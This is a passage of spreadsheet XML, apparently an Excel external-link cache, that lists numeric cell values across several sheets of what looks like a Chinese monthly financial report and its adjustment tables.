            <v>19740.79</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>2097</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3650.48999999999</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>11039.6</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>393.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>15599.23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715.440000000001</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>159</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4205.557</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>1367.93</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>56.1738505747126</v>
          </cell>
          <cell r="V68">
            <v>70.3225436179982</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>54.8347701149425</v>
          </cell>
          <cell r="V69">
            <v>67.2925849403122</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.33</v>
          </cell>
          <cell r="R71" t="str">
            <v>332.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4359.33</v>
          </cell>
          <cell r="T71">
            <v>34.7083333333333</v>
          </cell>
          <cell r="U71">
            <v>47.8204022988506</v>
          </cell>
          <cell r="V71">
            <v>50.0382231404959</v>
          </cell>
          <cell r="W71">
            <v>251.740696278511</v>
          </cell>
          <cell r="X71">
            <v>222.28464982123</v>
          </cell>
          <cell r="Y71">
            <v>214.1711570356</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>11.17</v>
          </cell>
          <cell r="R72" t="str">
            <v>461.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4530.17</v>
          </cell>
          <cell r="T72">
            <v>46.5416666666667</v>
          </cell>
          <cell r="U72">
            <v>66.3318965517241</v>
          </cell>
          <cell r="V72">
            <v>51.9991965105602</v>
          </cell>
          <cell r="W72">
            <v>59.8925693822739</v>
          </cell>
          <cell r="X72">
            <v>62.8890766131652</v>
          </cell>
          <cell r="Y72">
            <v>61.4478043870318</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>11.17</v>
          </cell>
          <cell r="R73" t="str">
            <v>468.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4664.38</v>
          </cell>
          <cell r="T73">
            <v>46.5416666666667</v>
          </cell>
          <cell r="U73">
            <v>67.2658045977011</v>
          </cell>
          <cell r="V73">
            <v>53.5397153351699</v>
          </cell>
          <cell r="W73">
            <v>64.7269471799463</v>
          </cell>
          <cell r="X73">
            <v>60.9500822350855</v>
          </cell>
          <cell r="Y73">
            <v>62.7194289487563</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="29">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2032</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>38802.806</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>2770</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>4367.28</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>51239.2</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>139.440000000001</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6317.42</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>334.34</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>19406.45</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>2770</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3500.5</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>10309.1</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>393</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>15206.23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223.719999999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>118</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4311.277</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>710.420000000002</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>54.3013888888889</v>
          </cell>
          <cell r="V68">
            <v>70.1293498168498</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>53.0069444444444</v>
          </cell>
          <cell r="V69">
            <v>67.1077152014652</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>340.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4367.33</v>
          </cell>
          <cell r="T71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U71">
            <v>47.3375</v>
          </cell>
          <cell r="V71">
            <v>49.9923305860806</v>
          </cell>
          <cell r="W71">
            <v>221</v>
          </cell>
          <cell r="X71">
            <v>222.254496376493</v>
          </cell>
          <cell r="Y71">
            <v>214.183665992723</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>469.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4538.17</v>
          </cell>
          <cell r="T72">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U72">
            <v>65.2319444444445</v>
          </cell>
          <cell r="V72">
            <v>51.9479166666667</v>
          </cell>
          <cell r="W72">
            <v>62.375</v>
          </cell>
          <cell r="X72">
            <v>62.8803202248387</v>
          </cell>
          <cell r="Y72">
            <v>61.4494388707342</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>476.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4672.38</v>
          </cell>
          <cell r="T73">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U73">
            <v>66.1347222222222</v>
          </cell>
          <cell r="V73">
            <v>53.4842032967033</v>
          </cell>
          <cell r="W73">
            <v>62.875</v>
          </cell>
          <cell r="X73">
            <v>60.9824222441565</v>
          </cell>
          <cell r="Y73">
            <v>62.7196953158776</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="30">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0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2078</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>36724.806</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>2931</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5010.97000000001</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>49159.23</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>147.5</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6169.92</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>317.4</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>19089.05</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>2931</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4047.57000000001</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>9192.53</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>498.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>14707.73</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0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>125</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4186.277</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="L63">
            <v>10467.44</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>52.5497311827957</v>
          </cell>
          <cell r="V68">
            <v>69.9372146118722</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>263.636596158273</v>
          </cell>
          <cell r="Y68">
            <v>266.206969721701</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>51.2970430107527</v>
          </cell>
          <cell r="V69">
            <v>66.9238584474886</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.5925764408544</v>
          </cell>
          <cell r="Y69">
            <v>25.1966540548776</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>348.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4375.33</v>
          </cell>
          <cell r="T71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U71">
            <v>46.885752688172</v>
          </cell>
          <cell r="V71">
            <v>49.9466894977169</v>
          </cell>
          <cell r="W71">
            <v>222.5</v>
          </cell>
          <cell r="X71">
            <v>222.260126709285</v>
          </cell>
          <cell r="Y71">
            <v>214.198871856523</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>9.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>478.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4547.17</v>
          </cell>
          <cell r="T72">
            <v>37.5</v>
          </cell>
          <cell r="U72">
            <v>64.3373655913979</v>
          </cell>
          <cell r="V72">
            <v>51.9083333333333</v>
          </cell>
          <cell r="W72">
            <v>64.8888888888889</v>
          </cell>
          <cell r="X72">
            <v>62.9180855286523</v>
          </cell>
          <cell r="Y72">
            <v>61.4562464126039</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>9.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>485.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4681.38</v>
          </cell>
          <cell r="T73">
            <v>37.5</v>
          </cell>
          <cell r="U73">
            <v>65.2110215053763</v>
          </cell>
          <cell r="V73">
            <v>53.4404109589041</v>
          </cell>
          <cell r="W73">
            <v>63</v>
          </cell>
          <cell r="X73">
            <v>61.0198487128223</v>
          </cell>
          <cell r="Y73">
            <v>62.720234204444</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="31">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>4724.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>500</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>364</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>36860.806</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3.63797880709171e-12</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>49159.23</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0.0200000000004366</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6169.94</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0.0499999999992724</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>19089.1</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>-0.729999999995925</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>9191.8</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0.659999999999854</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>14708.39</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I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cell r="R29">
            <v>-26.7979999999998</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4159.479</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>52.5497311827957</v>
          </cell>
          <cell r="V68">
            <v>69.9372146118722</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>264.915466659846</v>
          </cell>
          <cell r="Y68">
            <v>266.288582387987</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>51.2970430107527</v>
          </cell>
          <cell r="V69">
            <v>66.9238584474886</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.3202339065365</v>
          </cell>
          <cell r="Y69">
            <v>25.1791608162718</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>348.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4375.33</v>
          </cell>
          <cell r="T71">
            <v>0</v>
          </cell>
          <cell r="U71">
            <v>46.885752688172</v>
          </cell>
          <cell r="V71">
            <v>49.9466894977169</v>
          </cell>
          <cell r="W71">
            <v>0</v>
          </cell>
          <cell r="X71">
            <v>222.260786056245</v>
          </cell>
          <cell r="Y71">
            <v>214.198924423986</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>478.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4547.17</v>
          </cell>
          <cell r="T72">
            <v>0</v>
          </cell>
          <cell r="U72">
            <v>64.3373655913979</v>
          </cell>
          <cell r="V72">
            <v>51.9083333333333</v>
          </cell>
          <cell r="W72">
            <v>0</v>
          </cell>
          <cell r="X72">
            <v>62.9180855286523</v>
          </cell>
          <cell r="Y72">
            <v>61.4562464126039</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>485.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4681.38</v>
          </cell>
          <cell r="T73">
            <v>0</v>
          </cell>
          <cell r="U73">
            <v>65.2110215053763</v>
          </cell>
          <cell r="V73">
            <v>53.4404109589041</v>
          </cell>
          <cell r="W73">
            <v>0</v>
          </cell>
          <cell r="X73">
            <v>61.0193746521838</v>
          </cell>
          <cell r="Y73">
            <v>62.7201850736321</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="32">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>4724.516</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>36860.806</v>
          </cell>
        </row>
        <row r="14">
          <cell r="L14">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="L15">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>49159.23</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>6169.94</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>19089.1</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>9191.8</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>14708.39</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="P23">
            <v>0</v>
          </cell>
          <cell r="Q23">
            <v>0</v>
          </cell>
          <cell r="R23">
            <v>0</v>
          </cell>
          <cell r="S23">
            <v>0</v>
          </cell>
          <cell r="T23">
            <v>1.329</v>
          </cell>
        </row>
        <row r="23">
          <cell r="V23">
            <v>0</v>
          </cell>
          <cell r="W23">
            <v>0</v>
          </cell>
          <cell r="X23">
            <v>1.329</v>
          </cell>
          <cell r="Y23">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="P29">
            <v>8000</v>
          </cell>
          <cell r="Q29">
            <v>2299.457</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>4159.479</v>
          </cell>
        </row>
        <row r="63">
          <cell r="L63">
            <v>10467.44</v>
          </cell>
        </row>
        <row r="68">
          <cell r="R68" t="str">
            <v>390.97</v>
          </cell>
          <cell r="S68" t="str">
            <v>6126.50</v>
          </cell>
        </row>
        <row r="68">
          <cell r="U68">
            <v>52.5497311827957</v>
          </cell>
          <cell r="V68">
            <v>69.9372146118722</v>
          </cell>
        </row>
        <row r="68">
          <cell r="X68">
            <v>264.915466659846</v>
          </cell>
          <cell r="Y68">
            <v>266.288582387987</v>
          </cell>
        </row>
        <row r="69">
          <cell r="R69" t="str">
            <v>381.65</v>
          </cell>
          <cell r="S69" t="str">
            <v>5862.53</v>
          </cell>
        </row>
        <row r="69">
          <cell r="U69">
            <v>51.2970430107527</v>
          </cell>
          <cell r="V69">
            <v>66.9238584474886</v>
          </cell>
        </row>
        <row r="69">
          <cell r="X69">
            <v>22.3202339065365</v>
          </cell>
          <cell r="Y69">
            <v>25.1791608162718</v>
          </cell>
        </row>
        <row r="71">
          <cell r="R71" t="str">
            <v>348.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4375.33</v>
          </cell>
        </row>
        <row r="71">
          <cell r="U71">
            <v>46.885752688172</v>
          </cell>
          <cell r="V71">
            <v>49.9466894977169</v>
          </cell>
        </row>
        <row r="71">
          <cell r="X71">
            <v>222.260786056245</v>
          </cell>
          <cell r="Y71">
            <v>214.198924423986</v>
          </cell>
        </row>
        <row r="72">
          <cell r="R72" t="str">
            <v>478.67</v>
          </cell>
          <cell r="S72" t="str">
            <v>4547.17</v>
          </cell>
        </row>
        <row r="72">
          <cell r="U72">
            <v>64.3373655913979</v>
          </cell>
          <cell r="V72">
            <v>51.9083333333333</v>
          </cell>
        </row>
        <row r="72">
          <cell r="X72">
            <v>62.9180855286523</v>
          </cell>
          <cell r="Y72">
            <v>61.4562464126039</v>
          </cell>
        </row>
        <row r="73">
          <cell r="R73" t="str">
            <v>485.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4681.38</v>
          </cell>
        </row>
        <row r="73">
          <cell r="U73">
            <v>65.2110215053763</v>
          </cell>
          <cell r="V73">
            <v>53.4404109589041</v>
          </cell>
        </row>
        <row r="73">
          <cell r="X73">
            <v>61.0193746521838</v>
          </cell>
          <cell r="Y73">
            <v>62.7201850736321</v>
          </cell>
        </row>
      </sheetData>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调整表"/>
      <sheetName val="月报"/>
      <sheetName val="Sheet1"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0">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67564.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>419.5</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>25710.26</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1077.58</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>259</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>10143.95</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="34">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0</v>
          </cell>
          <cell r="S74">
            <v>561.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>0</v>
          </cell>
          <cell r="V74">
            <v>6.98917910447761</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>0</v>
          </cell>
          <cell r="Y74">
            <v>222.404925880448</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="1">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67564.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>339</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>25371.26</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1077.58</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>179</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>9964.95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0</v>
          </cell>
          <cell r="S74">
            <v>561.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>0</v>
          </cell>
          <cell r="V74">
            <v>6.96837797619047</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>0</v>
          </cell>
          <cell r="Y74">
            <v>222.404925880448</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="2">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67564.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>434.5</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>24936.76</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1077.58</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>231.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>9733.45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0</v>
          </cell>
          <cell r="S74">
            <v>561.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>0</v>
          </cell>
          <cell r="V74">
            <v>6.94770029673591</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>0</v>
          </cell>
          <cell r="Y74">
            <v>222.404925880448</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3">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67564.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>26129.76</v>
          </cell>
          <cell r="E16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>347</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>24589.76</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1077.58</v>
          </cell>
        </row>
        <row r="21">
          <cell r="D21">
            <v>10402.95</v>
          </cell>
          <cell r="E21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="I21">
            <v>199.5</v>
          </cell>
        </row>
        <row r="21">
          <cell r="L21">
            <v>9533.95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0</v>
          </cell>
          <cell r="S74">
            <v>561.93</v>
          </cell>
          <cell r="T74">
            <v>0</v>
          </cell>
          <cell r="U74">
            <v>0</v>
          </cell>
          <cell r="V74">
            <v>6.9271449704142</v>
          </cell>
          <cell r="W74">
            <v>0</v>
          </cell>
          <cell r="X74">
            <v>0</v>
          </cell>
          <cell r="Y74">
            <v>222.404925880448</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="4">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67564.78</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
